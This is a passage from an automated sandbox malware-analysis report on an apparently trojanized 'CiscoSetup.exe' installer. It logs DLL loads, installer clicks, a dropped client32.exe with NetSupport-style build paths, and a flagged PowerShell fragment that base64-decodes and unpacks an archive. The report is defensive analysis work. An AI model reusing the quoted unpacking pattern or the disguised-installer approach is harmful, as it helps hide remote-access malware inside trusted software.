                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Cisco Secure Client for Windows.lnk.2.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\Cisco\nsm_vpro.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpWindow found: window name: TSelectLanguageFormJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Install
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: CiscoSetup.exeStatic PE information: certificate valid
                                  Source: CiscoSetup.exeStatic file information: File size 16883280 > 1048576
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to behavior
                                  Source: CiscoSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000006.00000002.4600795851.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000009.00000002.2498300418.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2580406925.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb&&&GCTL source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000004.00000002.2458265497.000000000756A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\Win32\Release\InstallHelper.pdb source: is-H5812.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb...GCTL source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdb source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Phoenix\third-party\libcurl\out.win.7.x86\curl-7.84.0\builds\libcurl-vc-x86-release-dll-ssl-dll-ipv6-sspi-obj-lib\accurl.pdb source: is-2J155.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdb source: is-2TJID.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdbGCTL source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.4600362190.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2498047838.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2580034650.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2409667962.0000000003148000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdb source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb; source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdbMM/GCTL source: is-2TJID.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdbGCTL source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000006.00000002.4600671174.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000009.00000002.2498203499.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2580255021.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp

                                  Data Obfuscation

                                  barindex
                                  Found suspicious powershell code related to unpacking or dynamic code loading
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029230
                                  Source: CiscoSetup.exeStatic PE information: section name: .didata
                                  Source: CiscoSetup.tmp.0.drStatic PE information: section name: .didata
                                  Source: is-VTFF8.tmp.2.drStatic PE information: section name: .didata
                                  Source: is-3NCDE.tmp.2.drStatic PE information: section name: fipstx
                                  Source: is-3NCDE.tmp.2.drStatic PE information: section name: fipsro
                                  Source: is-3NCDE.tmp.2.drStatic PE information: section name: fipsda
                                  Source: is-3NCDE.tmp.2.drStatic PE information: section name: fsig
                                  Source: is-3NCDE.tmp.2.drStatic PE information: section name: fipsrd
                                  Source: is-KLEUG.tmp.2.drStatic PE information: section name: _RDATA
                                  Source: is-8761D.tmp.2.drStatic PE information: section name: _RDATA
                                  Source: is-7ITNQ.tmp.2.drStatic PE information: section name: .orpc
                                  Source: is-S996S.tmp.2.drStatic PE information: section name: .00cfg
                                  Source: is-S996S.tmp.2.drStatic PE information: section name: .voltbl
                                  Source: PCICL32.DLL.4.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A1C492 pushad ; ret 4_2_04A1C493
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07689740 pushad ; ret 4_2_07689A25
